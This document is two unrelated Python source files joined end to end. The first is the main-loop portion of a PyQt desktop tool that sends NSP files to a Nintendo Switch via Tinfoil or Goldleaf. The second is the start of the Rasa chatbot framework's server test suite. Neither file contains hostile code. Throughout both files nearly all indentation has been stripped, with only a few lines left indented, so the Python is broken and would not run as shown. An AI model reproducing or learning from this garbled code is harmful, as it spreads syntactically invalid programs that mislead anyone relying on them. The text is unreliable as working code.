set_ip(txt_ip.text(), 0)
set_ip(txt_ip2.text(), 1)
set_sent_header()
set_start_time()
tinnet = TinfoilNetwork()
thread = threading.Thread(target=tinnet.init)
thread.daemon = True
thread.start()
else:
if is_goldleaf:
set_sent_header()
set_start_time()
gold = Goldleaf()
thread = threading.Thread(target=gold.init)
thread.daemon = True
thread.start()
else:
set_sent_header()
set_start_time()
tin = Tinfoil()
thread = threading.Thread(target=tin.init)
thread.daemon = True
thread.start()
else:
cancel_task()
@staticmethod
def nsp_file_dialog():
try:
d = filedialog.askopenfilenames(parent=root,title=Language.CurrentDict[13],filetypes=[("NSP files", "*.nsp")])
tmp = list()
list_nsp.clear()
i = 0
if not is_goldleaf:
file_list = list(d)
for f in file_list:
if str(f).endswith(".nsp"):
i += 1
list_nsp.addItem(os.path.basename(str(f)))
tmp.append(f)
else:
tmp.append(str(d))
list_nsp.addItem(os.path.basename(str(d)))
i+=1
if i > 0:
btn_header.setEnabled(True)
set_total_nsp(i)
set_dir(os.path.dirname(tmp[0]))
set_selected_files(tmp)
l_status.setText(str(total_nsp) + " " + Language.CurrentDict[14])
else:
btn_header.setEnabled(False)
l_status.setText(Language.CurrentDict[9])
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
pass
@staticmethod
def dark_mode_cmd():
if dark_check.isChecked():
try:
set_dark_mode(1)
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
logging.debug('Error: Failed to set Dark Mode')
print('Error: Failed to set Dark Mode')
print(str(e))
pass
else:
set_dark_mode(0)
@staticmethod
def tin_radio_cmd():
l_nsp.setVisible(True)
combo.setVisible(True)
l_rate.setVisible(True)
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
txt_port.setEnabled(False)
net_radio.setChecked(False)
usb_radio.setChecked(True)
net_radio.setVisible(True)
set_goldleaf(False)
split_check.setEnabled(True)
l_status.setText(Language.CurrentDict[9])
gold_img_label.setVisible(False)
btn_header.setEnabled(False)
btn_nsp.setEnabled(True)
btn_nsp.setVisible(True)
l_ip.setVisible(True)
txt_ip.setVisible(True)
list_nsp.setVisible(True)
txt_ip2.setVisible(True)
l_host.setVisible(True)
usb_radio.setVisible(True)
window.adjustSize()
@staticmethod
def gold_radio_cmd():
l_nsp.setVisible(False)
combo.setVisible(False)
l_rate.setVisible(False)
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
txt_port.setEnabled(False)
net_radio.setChecked(False)
usb_radio.setChecked(True)
net_radio.setVisible(False)
set_network(False)
set_goldleaf(True)
split_check.setCheckState(False)
split_check.setEnabled(False)
list_nsp.clear()
l_status.setText('')
btn_nsp.setVisible(False)
l_ip.setVisible(False)
txt_ip.setVisible(False)
list_nsp.setVisible(False)
txt_ip2.setVisible(False)
l_host.setVisible(False)
usb_radio.setVisible(False)
gold_img_label.setVisible(True)
window.adjustSize()
@staticmethod
def usb_radio_cmd():
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
combo.setEnabled(True)
set_network(False)
txt_port.setEnabled(False)
split_check.setEnabled(True)
@staticmethod
def net_radio_cmd():
txt_ip.setEnabled(True)
txt_ip2.setEnabled(True)
combo.setEnabled(False)
set_network(True)
txt_port.setEnabled(True)
split_check.setCheckState(False)
split_check.setEnabled(False)
@staticmethod
def set_done_text():
tmp_string = str(total_nsp)
if not is_goldleaf:
reset_install()
l_nsp.setText(Language.CurrentDict[8] + " " + tmp_string + " NSP(s)!")
@staticmethod
def set_loading_text():
l_nsp.setText("")
l_status.setText("")
if not is_goldleaf:
l_switch.setText(str(total_nsp) + " " + Language.CurrentDict[26] + ".")
l_switch.setStyleSheet(PURPLE)
else:
l_switch.setText(Language.CurrentDict[9] + ".")
l_switch.setStyleSheet(BLUE)
progressbar.setValue(0)
@staticmethod
def set_progress_text():
        v = (int(cur_progress) / int(end_progress)) * 100
        progressbar.setValue(int(v))  # QProgressBar.setValue() expects an int
        n_rate = round(cur_transfer_rate / 1000000, 2)
if n_rate < 0:
n_rate = 0.0
if not is_goldleaf:
l_status.setText(Language.CurrentDict[27] + " " + str(cur_nsp_count) + " / " + str(total_nsp) + " NSP(s).")
l_switch.setText(Language.CurrentDict[28] + ": " + str(n_rate) + "MB/s.")
l_switch.setStyleSheet(GREEN)
l_status.setStyleSheet(GREEN)
if len(cur_nsp_name) > 13:
if is_goldleaf:
l_status.setText("\"" + cur_nsp_name[:13] + "...\"")
else:
l_nsp.setText(Language.CurrentDict[7] + ": \"" + cur_nsp_name[:13] + "...\"")
else:
if is_goldleaf:
l_status.setText("\"" + cur_nsp_name + "\"")
else:
l_nsp.setText(Language.CurrentDict[7] + ": \"" + cur_nsp_name + "\"")
@staticmethod
def set_switch_text():
try:
if connect_switch():
set_usb_success(True)
l_switch.setText(Language.CurrentDict[11]+"!")
l_switch.setStyleSheet(GREEN)
if not is_goldleaf:
if list_nsp.count() > 0:
btn_header.setEnabled(True)
else:
btn_header.setEnabled(False)
else:
btn_header.setEnabled(True)
else:
l_switch.setText(Language.CurrentDict[10]+"!")
btn_header.setEnabled(False)
l_switch.setStyleSheet(RED)
try:
detach_switch()
except:
pass
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
set_usb_success(False)
UI.check_usb_success()
pass
@staticmethod
def init_language():
l_nsp.setText("")
if not is_goldleaf:
if list_nsp.count() > 0:
l_status.setText(str(total_nsp) + " " + Language.CurrentDict[14])
else:
l_status.setText(Language.CurrentDict[9])
l_switch.setText(Language.CurrentDict[10]+"!")
l_ip.setText(Language.CurrentDict[2]+":")
dark_check.setText(Language.CurrentDict[20])
net_radio.setText(Language.CurrentDict[24])
btn_nsp.setText(Language.CurrentDict[13])
btn_header.setText(Language.CurrentDict[1])
l_rate.setText(Language.CurrentDict[4])
        combo.clear()
        combo.addItem(Language.CurrentDict[5])
        combo.addItem(Language.CurrentDict[6])
        combo.setCurrentIndex(0)  # was `combo.SelectedIndex = 0`, a stray attribute Qt ignores
l_host.setText(Language.CurrentDict[3]+":")
lang_menu.setTitle(Language.CurrentDict[22])
window.setWindowTitle(Language.CurrentDict[0])
about.setWindowTitle(Language.CurrentDict[30])
l_thanks.setText(Language.CurrentDict[31])
l_donate.setText(Language.CurrentDict[32])
about_menu.setText(Language.CurrentDict[30])
@staticmethod
def lang_menu_cmd():
ai = 0
for action in lang_menu.actions():
if action.isChecked():
if ai != language:
set_language(ai)
UI.init_language()
ai+=1
@staticmethod
def about_menu_cmd():
try:
random.shuffle(thanks)
credit_list.clear()
for a in thanks:
credit_list.addItem(a)
about.show()
about.setFixedSize(about.size().width(),about.size().height())
except Exception as e:
print(str(e))
@staticmethod
def check_usb_success():
try:
connect_switch()
set_usb_success(True)
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
set_usb_success(False)
pass
if not usb_success:
UI.net_radio_cmd()
net_radio.setChecked(True)
usb_radio.setVisible(False)
l_rate.setVisible(False)
combo.setVisible(False)
gold_radio.setVisible(False)
l_switch.setText(Language.CurrentDict[12])
l_switch.setStyleSheet(BLUE)
# Main
try:
# Load Images
aboutpixmap.loadFromData(base64.b64decode(ABOUT_DATA))
goldpixmap.loadFromData(base64.b64decode(GOLD_DATA))
iconpixmap.loadFromData(base64.b64decode(ICON_DATA))
inlaypixmap.loadFromData(base64.b64decode(DONUT_DATA))
dinlaypixmap.loadFromData(base64.b64decode(DARK_DONUT_DATA))
#Init Widgets
l_host = QtWidgets.QLabel(Language.CurrentDict[3]+":")
txt_ip2 = QtWidgets.QLineEdit("0.0.0.0")
l_nsp = QtWidgets.QLabel("")
l_ip = QtWidgets.QLabel(Language.CurrentDict[2]+":")
l_port = QtWidgets.QLabel("Port:")
txt_ip = QtWidgets.QLineEdit("0.0.0.0")
tin_radio = QtWidgets.QRadioButton("Tinfoil")
gold_radio = QtWidgets.QRadioButton("Goldleaf")
split_check = QtWidgets.QCheckBox("Use Split NSP")
dark_check = QtWidgets.QCheckBox(Language.CurrentDict[20])
usb_radio = QtWidgets.QRadioButton("USB")
net_radio = QtWidgets.QRadioButton(Language.CurrentDict[24])
btn_nsp = QtWidgets.QPushButton(Language.CurrentDict[13])
btn_header = QtWidgets.QPushButton(Language.CurrentDict[1])
l_rate = QtWidgets.QLabel(Language.CurrentDict[4])
l_github = QtWidgets.QLabel("v" + VERSION)
l_status = QtWidgets.QLabel(Language.CurrentDict[9])
l_switch = QtWidgets.QLabel(Language.CurrentDict[10]+"!")
list_nsp = QtWidgets.QListWidget()
combo = QComboBox()
h_box = QtWidgets.QHBoxLayout()
h2_box = QtWidgets.QHBoxLayout()
h3_box = QtWidgets.QHBoxLayout()
h_group = QtWidgets.QButtonGroup()
v_box = QtWidgets.QVBoxLayout()
img_label = QLabel()
progressbar = QProgressBar()
gold_img_label = QLabel()
about = QMainWindow()
about_v_box = QtWidgets.QVBoxLayout()
credit_list = QtWidgets.QListWidget()
monero_list = QtWidgets.QListWidget()
about_img_label = QLabel()
l_thanks = QtWidgets.QLabel(Language.CurrentDict[31])
l_donate = QtWidgets.QLabel(Language.CurrentDict[32])
# Set Widgets
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 53))
fill = s.getsockname()[0]
s.close()
txt_ip2.setText(str(fill))
except Exception:
pass
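# Note: connect() on a UDP socket sends no packets; it only makes the kernel
# pick a route and source address for 8.8.8.8, so getsockname() reports the
# machine's outward-facing LAN IP. socket.gethostbyname() is avoided here
# because it can return 127.0.0.1 on hosts whose hostname maps to loopback.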
try:
txt_ip.setText(switch_ip)
except Exception:
txt_ip.setText("0.0.0.0")
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
txt_port = QtWidgets.QLineEdit("2000")
txt_port.setEnabled(False)
h3_box.addWidget(dark_check)
h3_box.addStretch()
h3_box.addWidget(l_github)
combo.addItem(Language.CurrentDict[6])
combo.addItem(Language.CurrentDict[5])
combo.setCurrentIndex(1)
tin_radio.setChecked(True)
tin_radio.toggled.connect(UI.tin_radio_cmd)
gold_radio.setChecked(False)
gold_radio.toggled.connect(UI.gold_radio_cmd)
h_group.addButton(tin_radio)
h_group.addButton(gold_radio)
h2_box.addWidget(tin_radio)
h2_box.addWidget(gold_radio)
dark_check.stateChanged.connect(UI.dark_mode_cmd)
usb_radio.setChecked(True)
usb_radio.toggled.connect(UI.usb_radio_cmd)
h_box.addWidget(usb_radio)
net_radio.toggled.connect(UI.net_radio_cmd)
h_box.addWidget(net_radio)
btn_header.setEnabled(False)
progressbar.setAlignment(Qt.AlignVCenter)
progressbar.setMaximum(100)
img_label.setAlignment(Qt.AlignCenter)
gold_img_label.setAlignment(Qt.AlignCenter)
gold_img_label.setPixmap(goldpixmap)
# About Window
about_v_box.setContentsMargins(0,0,0,0)
about_img_label.setAlignment(Qt.AlignCenter)
l_thanks.setAlignment(Qt.AlignCenter)
l_donate.setAlignment(Qt.AlignCenter)
about_img_label.setPixmap(aboutpixmap)
about_v_box.addWidget(about_img_label)
about_v_box.addWidget(l_thanks)
about_v_box.addWidget(credit_list)
about_v_box.addWidget(l_donate)
about_v_box.addWidget(monero_list)
about.setCentralWidget(QWidget(about))
about.centralWidget().setLayout(about_v_box)
about.setWindowTitle(Language.CurrentDict[30])
about.setWindowIcon(QIcon(iconpixmap))
for a in thanks:
credit_list.addItem(a)
monero_list.addItem("Monero(XMR)")
monero_list.addItem(MONERO_ADDRESS)
# Menu Bar
lang_menu = window.menuBar().addMenu(Language.CurrentDict[22])
about_menu = window.menuBar().addAction(Language.CurrentDict[30])
lang_group = QActionGroup(lang_menu)
#lang_group.setExclusive(True)
lang_group.addAction(QAction('English',lang_group,checkable=True))
lang_group.addAction(QAction('中文',lang_group,checkable=True))
lang_group.addAction(QAction('Tiếng Việt',lang_group,checkable=True))
lang_group.addAction(QAction('Türkçe',lang_group,checkable=True))
lang_group.addAction(QAction('Português Brasileiro',lang_group,checkable=True))
lang_group.addAction(QAction('Italiano',lang_group,checkable=True))
lang_group.addAction(QAction('Français',lang_group,checkable=True))
lang_group.addAction(QAction('Español',lang_group,checkable=True))
lang_group.addAction(QAction('Deutsch',lang_group,checkable=True))
lang_group.addAction(QAction('Bahasa Indonesia',lang_group,checkable=True))
lang_group.addAction(QAction('한국어',lang_group,checkable=True))
lang_menu.addActions(lang_group.actions())
lang_group.triggered.connect(UI.lang_menu_cmd)
about_menu.triggered.connect(UI.about_menu_cmd)
window.menuBar().setNativeMenuBar(False) # Possible macOS fix
# "And for gosh sake watch your language!" -Tony, May 1st 2015
aix = 0
for action in lang_menu.actions():
if aix == language:
action.setChecked(True)
aix += 1
UI.init_language()
# Occupy VBOX
v_box.addLayout(h2_box)
v_box.addWidget(img_label)
v_box.addStretch()
v_box.addWidget(gold_img_label)
v_box.addStretch()
v_box.addLayout(h_box)
v_box.addWidget(l_ip)
v_box.addWidget(txt_ip)
v_box.addWidget(l_host)
v_box.addWidget(txt_ip2)
v_box.addWidget(l_rate)
v_box.addWidget(combo)
v_box.addWidget(btn_nsp)
v_box.addWidget(btn_header)
v_box.addWidget(l_nsp)
v_box.addWidget(l_status)
v_box.addWidget(l_switch)
v_box.addWidget(progressbar)
v_box.addWidget(list_nsp)
v_box.addLayout(h3_box)
window.setCentralWidget(QWidget(window))
window.centralWidget().setLayout(v_box)
window.setWindowTitle(Language.CurrentDict[0])
btn_nsp.clicked.connect(UI.nsp_file_dialog)
btn_header.clicked.connect(UI.send_header_cmd)
window.setWindowIcon(QIcon(iconpixmap))
gold_img_label.setVisible(False)
window.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)
window.show()
# Try USB first; check_usb_success() falls back to network mode on failure
UI.check_usb_success()
# Checkbox for Dark Mode
if dark_mode == 1:
try:
set_dark_mode(1)
dark_check.setChecked(True)
except Exception:
set_dark_mode(0)
dark_check.setChecked(False)
else:
set_dark_mode(0)
dark_check.setChecked(False)
# Main loop
while True:
QApplication.processEvents()
# QMessage Response
if needresponse:
if ignore_warning_prompt == 0:
print("To ignore future prompts, change \'ignore_warning_prompt\' to 1 in fluffy.conf.")
# Map each Goldleaf request code to its confirmation prompt and ask once,
# instead of repeating the same QMessageBox block per code.
goldleaf_prompts = {
0: "Goldleaf wants to read a file that isn't an NSP.\nLet Goldleaf read this file?",
1: "Goldleaf wants to write a file.\nConfirm file write?",
2: "Goldleaf wants to create a file.\nConfirm creation?",
3: "Goldleaf wants to create a directory.\nConfirm creation?",
4: "Goldleaf wants to delete a file.\nConfirm deletion?",
5: "Goldleaf wants to delete a directory.\nConfirm deletion?",
6: "Goldleaf wants to rename a file or directory.\nConfirm rename?",
}
if qrespnum in goldleaf_prompts:
re = QMessageBox.warning(window, 'Warning!', goldleaf_prompts[qrespnum], QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
set_response_qmessage(re == QMessageBox.Yes)
else:
set_response_qmessage(True)
while haveresponse:
time.sleep(1)
# Check If Any Errors
if last_error != "NA":
if not task_canceled:
QMessageBox.critical(window, 'Error', last_error, QMessageBox.Ok)
reset_last_error()
cancel_task()
# Check Log Size
if is_logging:
if os.path.isfile(initial_dir + 'fluffy.log'):
if os.path.getsize(initial_dir + 'fluffy.log') > 250000:
logging.warning("Log size limit reached, turning off logging.")
turn_off_logging()
# Fix Dark Mode CheckBox
if dark_mode == 0 and dark_check.isChecked():
dark_check.setChecked(False)
# Save config and close
if not window.isVisible():
try:
switch_ip = txt_ip.text()
except Exception:
pass
save_config()
cancel_task()
sys.exit()
# Switch Indicator
if not is_installing and not is_network and usb_success and not sent_header:
UI.set_switch_text()
# Tinfoil Network Mode
if not sent_header and not is_installing and is_network:
l_switch.setText(Language.CurrentDict[12])
l_switch.setStyleSheet(BLUE)
btn_header.setEnabled(list_nsp.count() > 0)
# Network Header Sent
if sent_header and is_network:
try:
if is_done:
UI.set_done_text()
else:
if is_installing:
UI.set_progress_text()
else:
l_status.setText(Language.CurrentDict[25])
l_switch.setText(Language.CurrentDict[15])
l_switch.setStyleSheet(PURPLE)
except Exception:
pass
# Cancel Button
if sent_header and not is_done:
btn_header.setEnabled(True)
btn_header.setText(Language.CurrentDict[16])
# Installation in progress disable cancel
#if sent_header and is_installing and not is_done:
#btn_header.setEnabled(False)
# Goldleaf & Tinfoil USB Mode
if sent_header and not is_network:
try:
if is_done:
UI.set_done_text()
else:
if is_installing:
UI.set_progress_text()
else:
UI.set_loading_text()
except Exception:
pass
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
save_config()
sys.exit()
|
test_server.py | import asyncio
import json
import os
import time
import urllib.parse
import uuid
from contextlib import ExitStack
from http import HTTPStatus
from multiprocessing import Process, Manager
from multiprocessing.managers import DictProxy
from pathlib import Path
from typing import List, Text, Type, Generator, NoReturn, Dict, Optional
from unittest.mock import ANY, MagicMock, Mock
import pytest
import requests
from _pytest import pathlib
from _pytest.monkeypatch import MonkeyPatch
from aioresponses import aioresponses
from freezegun import freeze_time
from ruamel.yaml import StringIO
from sanic import Sanic
from sanic.testing import SanicASGITestClient
import rasa
import rasa.constants
import rasa.core.jobs
import rasa.nlu
import rasa.server
import rasa.shared.constants
import rasa.shared.utils.io
import rasa.utils.io
from rasa.core import utils
from rasa.core.agent import Agent, load_agent
from rasa.core.channels import (
channel,
CollectingOutputChannel,
RestInput,
SlackInput,
CallbackInput,
)
from rasa.core.channels.slack import SlackBot
from rasa.core.tracker_store import InMemoryTrackerStore
from rasa.model import unpack_model
from rasa.nlu.test import CVEvaluationResult
from rasa.shared.core import events
from rasa.shared.core.constants import (
ACTION_SESSION_START_NAME,
ACTION_LISTEN_NAME,
REQUESTED_SLOT,
SESSION_START_METADATA_SLOT,
)
from rasa.shared.core.domain import Domain, SessionConfig
from rasa.shared.core.events import (
Event,
UserUttered,
SlotSet,
BotUttered,
ActionExecuted,
SessionStarted,
)
from rasa.shared.core.trackers import DialogueStateTracker
from rasa.shared.nlu.constants import INTENT_NAME_KEY
from rasa.train import TrainingResult
from rasa.utils.endpoints import EndpointConfig
from tests.core.conftest import DEFAULT_STACK_CONFIG
from tests.nlu.utilities import ResponseTest
from tests.utilities import json_of_latest_request, latest_request
# a couple of event instances that we can use for testing
test_events = [
Event.from_parameters(
{
"event": UserUttered.type_name,
"text": "/goodbye",
"parse_data": {
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"entities": [],
},
}
),
BotUttered("Welcome!", {"test": True}),
SlotSet("cuisine", 34),
SlotSet("cuisine", "34"),
SlotSet("location", None),
SlotSet("location", [34, "34", None]),
]
# sequence of events expected at the beginning of trackers
session_start_sequence: List[Event] = [
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
]
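# Rasa opens every new conversation by executing action_session_start, which
# emits a SessionStarted event and then hands control back to action_listen;
# that is the three-event prefix asserted throughout the tests below.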
@pytest.fixture
def rasa_app_without_api(rasa_server_without_api: Sanic) -> SanicASGITestClient:
return rasa_server_without_api.asgi_client
@pytest.fixture
def rasa_app(rasa_server: Sanic) -> SanicASGITestClient:
return rasa_server.asgi_client
@pytest.fixture
def rasa_app_nlu(rasa_nlu_server: Sanic) -> SanicASGITestClient:
return rasa_nlu_server.asgi_client
@pytest.fixture
def rasa_app_core(rasa_core_server: Sanic) -> SanicASGITestClient:
return rasa_core_server.asgi_client
@pytest.fixture
def rasa_secured_app(rasa_server_secured: Sanic) -> SanicASGITestClient:
return rasa_server_secured.asgi_client
@pytest.fixture()
async def tear_down_scheduler() -> Generator[None, None, None]:
yield None
rasa.core.jobs.__scheduler = None
@pytest.mark.trains_model
async def test_root(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
async def test_root_without_enable_api(rasa_app_without_api: SanicASGITestClient):
_, response = await rasa_app_without_api.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
@pytest.mark.trains_model
async def test_root_secured(rasa_secured_app: SanicASGITestClient):
_, response = await rasa_secured_app.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
@pytest.mark.trains_model
async def test_version(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/version")
content = response.json()
assert response.status == HTTPStatus.OK
assert content.get("version") == rasa.__version__
assert (
content.get("minimum_compatible_version")
== rasa.constants.MINIMUM_COMPATIBLE_VERSION
)
@pytest.mark.trains_model
async def test_status(rasa_app: SanicASGITestClient, trained_rasa_model: Text):
_, response = await rasa_app.get("/status")
model_file = response.json()["model_file"]
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
assert os.path.isfile(model_file)
assert model_file == trained_rasa_model
@pytest.mark.trains_model
async def test_status_nlu_only(
rasa_app_nlu: SanicASGITestClient, trained_nlu_model: Text
):
_, response = await rasa_app_nlu.get("/status")
model_file = response.json()["model_file"]
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
assert "model_file" in response.json()
assert model_file == trained_nlu_model
@pytest.mark.trains_model
async def test_status_secured(rasa_secured_app: SanicASGITestClient):
_, response = await rasa_secured_app.get("/status")
assert response.status == HTTPStatus.UNAUTHORIZED
@pytest.mark.trains_model
async def test_status_not_ready_agent(rasa_app: SanicASGITestClient):
rasa_app.app.agent = None
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.CONFLICT
@pytest.fixture
def shared_statuses() -> DictProxy:
return Manager().dict()
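# Note: Manager().dict() returns a DictProxy backed by a separate manager
# process, so writes made inside the spawned server process below stay visible
# to the test process (a plain dict would not be shared across processes).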
@pytest.fixture
def background_server(
shared_statuses: DictProxy, tmpdir: pathlib.Path, monkeypatch: MonkeyPatch
) -> Generator[Process, None, None]:
# Create a fake model archive which the mocked train function can return
fake_model = Path(tmpdir) / "fake_model.tar.gz"
fake_model.touch()
fake_model_path = str(fake_model)
# Fake training function which blocks until we tell it to stop blocking
# If we can send a status request while this is blocking, we can be sure that the
# actual training is also not blocking
async def mocked_training_function(*_, **__) -> TrainingResult:
# Tell the others that we are now blocking
shared_statuses["started_training"] = True
# Block until somebody tells us to not block anymore
while shared_statuses.get("stop_training") is not True:
time.sleep(1)
return TrainingResult(model=fake_model_path)
def run_server(monkeypatch: MonkeyPatch) -> NoReturn:
import sys
monkeypatch.setattr(
sys.modules["rasa.train"], "train_async", mocked_training_function,
)
from rasa import __main__
sys.argv = ["rasa", "run", "--enable-api"]
__main__.main()
server = Process(target=run_server, args=(monkeypatch,))
yield server
server.terminate()
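# The fixture yields the Process without starting it, so each test controls
# exactly when the server comes up; terminate() in the teardown ensures the
# subprocess is cleaned up even if the test fails midway.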
@pytest.fixture()
def training_request(
shared_statuses: DictProxy, tmp_path: Path
) -> Generator[Process, None, None]:
def send_request() -> None:
payload = {}
project_path = Path("examples") / "formbot"
for file in [
"domain.yml",
"config.yml",
Path("data") / "rules.yml",
Path("data") / "stories.yml",
Path("data") / "nlu.yml",
]:
full_path = project_path / file
# Read the files in as dictionaries so that keys which are specified in
# multiple files (such as 'version') don't clash.
content = rasa.shared.utils.io.read_yaml_file(full_path)
payload.update(content)
concatenated_payload_file = tmp_path / "concatenated.yml"
rasa.shared.utils.io.write_yaml(payload, concatenated_payload_file)
payload_as_yaml = concatenated_payload_file.read_text()
response = requests.post(
"http://localhost:5005/model/train",
data=payload_as_yaml,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"force_training": True},
)
shared_statuses["training_result"] = response.status_code
train_request = Process(target=send_request)
yield train_request
train_request.terminate()
# For unknown reasons this test cannot be run in PyCharm (it results in
# segfaults), so we skip it there; the test still runs on CI.
# It also doesn't run on Windows because of Process-related calls and an
# attempt to start/terminate a process. We will investigate this further:
# https://github.com/RasaHQ/rasa/issues/6302
@pytest.mark.skipif("PYCHARM_HOSTED" in os.environ, reason="results in segfault")
@pytest.mark.skip_on_windows
@pytest.mark.trains_model
def test_train_status_is_not_blocked_by_training(
background_server: Process, shared_statuses: DictProxy, training_request: Process
):
background_server.start()
def is_server_ready() -> bool:
try:
return (
requests.get("http://localhost:5005/status").status_code
== HTTPStatus.OK
)
except Exception:
return False
# wait until the server is up before sending the train request and starting the status polling loop
start = time.time()
while not is_server_ready() and time.time() - start < 60:
time.sleep(1)
assert is_server_ready()
training_request.start()
# Wait until the blocking training function was called
start = time.time()
while (
shared_statuses.get("started_training") is not True and time.time() - start < 60
):
time.sleep(1)
# Check if the number of currently running trainings was incremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == HTTPStatus.OK
assert response.json()["num_active_training_jobs"] == 1
# Tell the blocking training function to stop
shared_statuses["stop_training"] = True
start = time.time()
while shared_statuses.get("training_result") is None and time.time() - start < 60:
time.sleep(1)
assert shared_statuses.get("training_result")
# Check that the training worked correctly
assert shared_statuses["training_result"] == HTTPStatus.OK
# Check if the number of currently running trainings was decremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == HTTPStatus.OK
assert response.json()["num_active_training_jobs"] == 0
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
@pytest.mark.trains_model
async def test_parse(rasa_app: SanicASGITestClient, response_test: ResponseTest):
_, response = await rasa_app.post(
response_test.endpoint, json=response_test.payload
)
rjs = response.json()
assert response.status == HTTPStatus.OK
assert all(prop in rjs for prop in ["entities", "intent", "text"])
assert rjs["entities"] == response_test.expected_response["entities"]
assert rjs["text"] == response_test.expected_response["text"]
assert rjs["intent"] == response_test.expected_response["intent"]
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse?emulation_mode=wit",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=dialogflow",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=luis",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
@pytest.mark.trains_model
async def test_parse_with_different_emulation_mode(
rasa_app: SanicASGITestClient, response_test: ResponseTest
):
_, response = await rasa_app.post(
response_test.endpoint, json=response_test.payload
)
assert response.status == HTTPStatus.OK
@pytest.mark.trains_model
async def test_parse_without_nlu_model(rasa_app_core: SanicASGITestClient):
_, response = await rasa_app_core.post("/model/parse", json={"text": "hello"})
assert response.status == HTTPStatus.OK
rjs = response.json()
assert all(prop in rjs for prop in ["entities", "intent", "text"])
@pytest.mark.trains_model
async def test_parse_on_invalid_emulation_mode(rasa_app_nlu: SanicASGITestClient):
_, response = await rasa_app_nlu.post(
"/model/parse?emulation_mode=ANYTHING", json={"text": "hello"}
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_train_stack_success_with_md(
rasa_app: SanicASGITestClient,
default_domain_path: Text,
default_stack_config: Text,
default_nlu_data: Text,
tmp_path: Path,
):
payload = dict(
domain=Path(default_domain_path).read_text(),
config=Path(default_stack_config).read_text(),
stories=Path("data/test_stories/stories_defaultdomain.md").read_text(),
nlu=Path(default_nlu_data).read_text(),
)
_, response = await rasa_app.post("/model/train", json=payload)
assert response.status == HTTPStatus.OK
assert response.headers["filename"] is not None
# save, unpack, and verify the model via the shared helper defined below
assert_trained_model(response.body, tmp_path)
@pytest.mark.trains_model
async def test_train_nlu_success(
rasa_app: SanicASGITestClient,
default_stack_config: Text,
default_nlu_data: Text,
default_domain_path: Text,
tmp_path: Path,
):
domain_data = rasa.shared.utils.io.read_yaml_file(default_domain_path)
config_data = rasa.shared.utils.io.read_yaml_file(default_stack_config)
nlu_data = rasa.shared.utils.io.read_yaml_file(default_nlu_data)
# combine all data into our payload
payload = {
key: val for d in [domain_data, config_data, nlu_data] for key, val in d.items()
}
data = StringIO()
rasa.shared.utils.io.write_yaml(payload, data)
_, response = await rasa_app.post(
"/model/train",
data=data.getvalue(),
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
# save, unpack, and verify the model via the shared helper defined below
assert_trained_model(response.body, tmp_path)
@pytest.mark.trains_model
async def test_train_core_success_with(
rasa_app: SanicASGITestClient,
default_stack_config: Text,
default_stories_file: Text,
default_domain_path: Text,
tmp_path: Path,
):
payload = f"""
{Path(default_domain_path).read_text()}
{Path(default_stack_config).read_text()}
{Path(default_stories_file).read_text()}
"""
_, response = await rasa_app.post(
"/model/train",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
# save, unpack, and verify the model via the shared helper defined below
assert_trained_model(response.body, tmp_path)
@pytest.mark.trains_model
async def test_train_with_retrieval_events_success(
rasa_app: SanicASGITestClient, default_stack_config: Text, tmp_path: Path
):
with ExitStack() as stack:
domain_file = stack.enter_context(
open("data/test_domains/default_retrieval_intents.yml")
)
config_file = stack.enter_context(open(default_stack_config))
core_file = stack.enter_context(
open("data/test_stories/stories_retrieval_intents.md")
)
responses_file = stack.enter_context(open("data/test_responses/default.yml"))
nlu_file = stack.enter_context(
open("data/test/stories_default_retrieval_intents.yml")
)
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=core_file.read(),
